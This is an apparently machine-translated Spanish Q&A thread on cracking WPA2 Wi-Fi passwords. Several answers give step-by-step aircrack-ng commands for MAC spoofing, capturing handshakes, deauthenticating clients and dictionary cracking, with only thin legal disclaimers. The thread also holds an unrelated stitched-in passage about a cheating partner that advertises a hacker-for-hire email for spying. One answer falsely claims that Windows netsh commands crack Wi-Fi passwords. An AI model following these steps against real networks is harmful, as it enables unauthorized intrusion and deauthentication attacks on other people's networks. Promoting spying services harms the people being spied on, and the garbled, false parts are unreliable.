¿Cómo pirateo la contraseña de Wi-Fi WPA2 usando Backtrack?

Antes de responder: Backtrack ahora es Kali Linux, descárgalo cuando tengas algo de tiempo libre.

Prerrequisitos:

  1. Kali / back track Linux, que por defecto tendrá todas las herramientas necesarias para descargar lo que desea.
  2. Una máquina virtual o una computadora portátil que puede usar para arrancar el BT o Kali
  3. Una tarjeta de red compatible. La tarjeta de red debe admitir la inyección de paquetes si desea hacerlo rápido; de lo contrario, tendrá que esperar un tiempo para que alguien se desconecte y vuelva a conectarse al punto de acceso.

Frases importantes para saber:

La dirección MAC (dirección de control de acceso a medios) es un identificador único asignado a las interfaces de red para las comunicaciones en el segmento físico de la red.

WAP (punto de acceso inalámbrico) es un dispositivo que permite que los dispositivos inalámbricos se conecten a una red cableada mediante Wi-Fi

BSSID (Identificación de conjunto de servicios básicos) es la dirección MAC del WAP

ESSID (Identificación de conjunto de servicio extendido) es el nombre para mostrar de la red inalámbrica

WPA / WPA2 (Acceso protegido Wi-Fi / Acceso protegido Wi-Fi II) son dos protocolos de seguridad y programas de certificación de seguridad desarrollados por Wi-Fi Alliance para proteger las redes inalámbricas de computadoras.

PSK (clave precompartida) es el término para la contraseña definida en las redes encriptadas WPA / WPA2.

PASO 1: Cambiar su dirección MAC:

  1. En Kali / BT abra la terminal.
  2. comando: ifconfig
  3. Esto debería enumerar todos los adaptadores de red en su sistema, incluido el inalámbrico, que debería llamarse algo así como: Wlanx {wlan0, wlan1 ….}
  4. Apague su tarjeta de red con el comando: ifconfig wlan0 down
    Nota: cambie wlan0 a lo que dijo en el comando anterior.
  5. comando: macchanger -m 00: 11: 22: 33: 44: 55
    Esto cambiará la dirección MAC de su dispositivo temporalmente
  6. Vuelva a encender el dispositivo: ifconfig wlan0 up

PASO 2: Cree una interfaz de monitoreo virtual.
Para escuchar las señales que maneja wlan0, crearemos una interfaz virtual que nos ayudará a monitorear y manejar lo que wlan0 está enviando y recibiendo.

  1. Comando: airmon-ng start wlan0
  2. Esto creará una nueva interfaz de monitor llamada mon0

PASO 3 : Comience el ataque monitoreando el tráfico inalámbrico

  1. Comando: airodump-ng mon0
    Esto enumerará todos los AP activos y su BSSID y otros detalles. También debajo de la lista verá la lista de estaciones de computadora conectadas a cualquiera de estos AP.
  2. Anote el BSSID y el canal que está utilizando (CH en la salida) del AP que desea golpear
  3. Presione Ctrl + c para finalizar el monitoreo.

PASO 4: Bloquee el AP necesario.
Esto apuntará a la comunicación desde el punto de acceso que desea y comenzará a escribir información no recopilada en un archivo que necesita piratear.

Lo que esperamos capturar es la información del protocolo de enlace de 4 vías que los sistemas usan para autenticar, esta información puede usarse para descifrar la contraseña utilizada.

  1. Comando: airodump-ng –bssid -c 4 -w dumpfilename mon0
    Las partes subrayadas deben cambiarse según los datos que tenga. dumpfilename se puede reemplazar con anyhting.
  2. Esto comenzará a monitorear el punto de acceso y le mostrará las estaciones conectadas a él también. Debe escribir el BSSID de cualquiera de las estaciones para poder engañarlo para que se desconecte y vuelva a conectar.

PASO 5: Capturando paquetes de autenticación
Nota: Esto solo funcionará si su tarjeta de red es compatible con la inyección de paquetes; de lo contrario, tendrá que esperar hasta que la persona se desconecte y vuelva a conectarse.

  1. Abrir nueva terminal y dar comando:
    aireplay-ng -0 30 -a mon0
    Esto enviará 30 solicitudes de desconexión a la computadora, lo que hará que intente volver a conectarse al punto de acceso.
  2. Si muestra algún error o parece que no funciona, probablemente sea el problema con la tarjeta de red y deberá esperar hasta que el usuario se vuelva a conectar por sí mismo.
  3. Una vez que ocurre la reconexión, puede verla en el terminal Airmon que está monitoreando los paquetes. Se debe mostrar una alerta en la esquina superior derecha.
    Presiona ctrl + c y sal de él. Es hora de descifrar la contraseña.

PASO 6: descifrando la contraseña

  1. Necesita un archivo de lista de contraseñas que se pueda descargar de Internet. Simplemente busque “lista de palabras” o “lista de contraseñas” para obtener archivos con millones de palabras y algunas tan grandes como 1GB a 10Gb. Más palabras en él, mejor.
  2. Obtenga y extraiga el archivo de lista de palabras en su carpeta de inicio.
  3. Ejecute el comando:
    aircrack-ng -w wordlist.lst -b   dumpfilename * .cap
  4. Reemplace el subrayado con los detalles correctos.

PASO 7: espera

  1. Espere un poco mientras su computadora hace el trabajo sucio de descifrar la contraseña. Debería tener la contraseña en su pantalla pronto.

Felices hazañas.

Verá, primero que todo lo que necesita saber sobre cómo hackear / descifrar contraseñas de enrutadores inalámbricos, es que solo puede hacer esto si su dispositivo que está a punto de realizar un hack tiene tarjeta NIC inalámbrica. Porque, para hackear wi-fi, necesita tener detalles al respecto, como el número de canal, BSSID, dirección MAC, etc. Estos detalles se pueden obtener mediante tarjetas NIC inalámbricas. Pero, los teléfonos inteligentes no tienen estas cosas. Si su teléfono inteligente está rooteado, es posible que pueda hacer que la interfaz de red de su dispositivo funcione como NIC inalámbrica. Pero, si su teléfono no está rooteado, no hay formas de hacerlo. Una vez que tenga detalles de wi-fi, puede realizar este hack usando AirCrack-NG, que es una herramienta basada en Linux.

Esta información es solo para fines educativos. No intente esta técnica en una red externa u otra. Hacerlo sin consentimiento previo es un delito cibernético.

Hiren Patel (Pune, MH)

Backtrack está desactualizado hoy en día, así que prefiera usar kali linux. Tiene todas las herramientas de pirateo ya instaladas.

Hackear WPA2 es un trabajo bastante fácil de hacer.

Revisa estos dos videos para entender cómo hackear wifi y sobre CeWL.

Cómo hackear wifi (WPA / WPA2) »Wiki Ùtil Debe mirar (principiantes)

Cómo usar CeWL | Tutorial

Suscríbete a este canal ya que muy pronto habrá nuevos videos sobre piratería informática. Además, si desea aprender un concepto particular de piratería o aprender alguna herramienta, escríbala en la sección de comentarios de cualquier video. Respuesta garantizada dentro de las 72 horas 🙂

Happy Hacking !!

Antes de hacer nada, decida qué hará si descubre que él lo está engañando. Si la respuesta es nada, ¿es algo que necesita saber? Piense por qué tiene ese sentimiento. ¿Tiene una base racional? Piense en lo que la divulgación de ese sentimiento podría significar para su relación. Implica que no confías en él; ¿Y si te equivocas? ¿Cómo se sentirá él? Como te sentiras Debe tener esto en cuenta para cada paso que sigue a continuación, 4. Calcule sus próximos pasos si el paso 5 ‘falla’ (siente que no obtuvo una respuesta veraz, o por alguna otra razón). No en el camino al trabajo, o en el baño mientras se está secando el cabello; encuentre un buen momento cuando pueda hablar abiertamente y pregúntele. Dígale por qué está preguntando y cómo se siente. Si siente que necesita cavar más (re paso 4), hágalo. Recuerde, está dañando una relación de confianza cada vez que decide llevarla más lejos, pero depende completamente de usted. Conozca lisarosehacker (at) Gmai | .com puede ayudarlo a descubrirlo fácilmente … ella le explicará algunos de sus problemas relacionados con el espionaje y la obtención de información

Hackear Wi-Fi WPA / WPA2 Contraseña
Hola a todos, hoy les voy a mostrar cómo hackear contraseñas de Wi-Fi usando Backtrack 5

¿Qué necesitamos para hackear la contraseña de Wi-Fi?

1) Backtrack 5 [R1 o R2 o R3, cualquiera de estas versiones]

2) Tarjeta Wi-Fi compatible

Entonces, comencemos … Primero abra la Terminal y luego siga mis pasos:

1) En Tipo de terminal: airmon-ng allí podemos ver interfaces.

2) Luego escriba: airmon-ng start wlan0 Debe encontrar procesos.

3) luego escribimos: airodump-ng mon0 comenzará a escanear redes wi-fi.

4) copie bssid y escriba: airodump-ng -c (canal) -w (nombre de archivo) –bssid (bssid) mon0

5) tipo: aireplay-ng -0 5 -a (bssid) mon0

6) haga clic en la carpeta de inicio de lugares, arrastre en el terminal wpa-01.cap en el terminal y escriba: aircrack-ng (directorio de archivos) o arrastre el archivo en
terminal

7) escriba en la terminal: aircrack-ng (nombre de archivo) *. Cap -w (ubicación del diccionario) y presione Enter!

¡Éxito! comparte este truco 100% funcional con tus amigos.

¿Soy el único que piensa que esto no va a funcionar? O alguien más también lo está pensando. Básicamente eres brutal, es como golpear a una virgen. Lleva mucho tiempo más ataques basados ​​en listas de palabras (ataques de diccionario). como un niño ahora, este niño le pregunta a sus amigos. Algunos de ellos conocen algunos capítulos, básicamente él noe tres para copiar cada pregunta de uno de ellos que termina usando todos sus recursos. Se están escribiendo mejores algoritmos mientras discutimos. Así que recomiendo no intentarlo ataques basados ​​en esa palabra, más bien piense en una forma de eludir esas etapas de secuencias.

BackTrack se ha convertido en Kali. Aquí hay un ejemplo de crack: Rompiendo WPA2-PSK con Kali Linux

Tenga en cuenta que solo funciona con PSK, y es un ataque de diccionario. Forzar la clave con fuerza bruta también es posible, pero si alguien usara una buena clave, tomaría más tiempo que tu vida descifrarla.

Además, tenga en cuenta que hacer esto sin el permiso del propietario de la red es ilegal. En algunos estados, incluso hacerlo con el permiso del propietario podría ser ilegal (estúpido pero cierto).

Busque y lea “El libro de Vivek Ramachandran sobre Pruebas de penetración inalámbrica con BackTrack”. Llegarás a saberlo todo. Te lo garantizo personalmente. #HappyHacking

Antes de mi respuesta, mi fuente es: Cómo hackear la contraseña de Wifi usando el símbolo del sistema

Cómo hackear la contraseña de Wifi usando cmd

1: Lea esta Guía Léame para obtener información completa.

Pasos para hackear la contraseña de Wifi usando cmd:

1: Abra el símbolo del sistema yendo a inicio y haga clic en ejecutar comando o ingrese windows + r, luego escriba cmd y presione Enter

2: en la ventana del símbolo del sistema, escriba

netsh wlan mostrar modo de red = bssid

3: este comando mostrará toda la red WiFi disponible en su área

4: Este es el último paso. Sólo tipo :

netsh wlan connect name = (nombre de wifi)

netsh wlan connect name = Mynet Sata1

y estarás conectado a esa red WiFi.

5: Para desconectarlo, escriba

netsh wlan desconectar

una pregunta más que surge es que supongo que quiero crackear wpa enterprises o wpa2 sin diccionario y la función wps también está deshabilitada, ¿hay alguna forma de hacerlo?

El uso de rever y todas esas herramientas tendrán una simple función de explotación de wps, así que ¿hay alguna otra forma de hacerlo como solíamos hacer para recolectar el iv?

Solo prueba este script de Bash

M no encuentra el directorio de contraseñas en la pista de atrás. ¿Cómo obtendré eso o descargaré el directorio de contraseñas en el backtrack?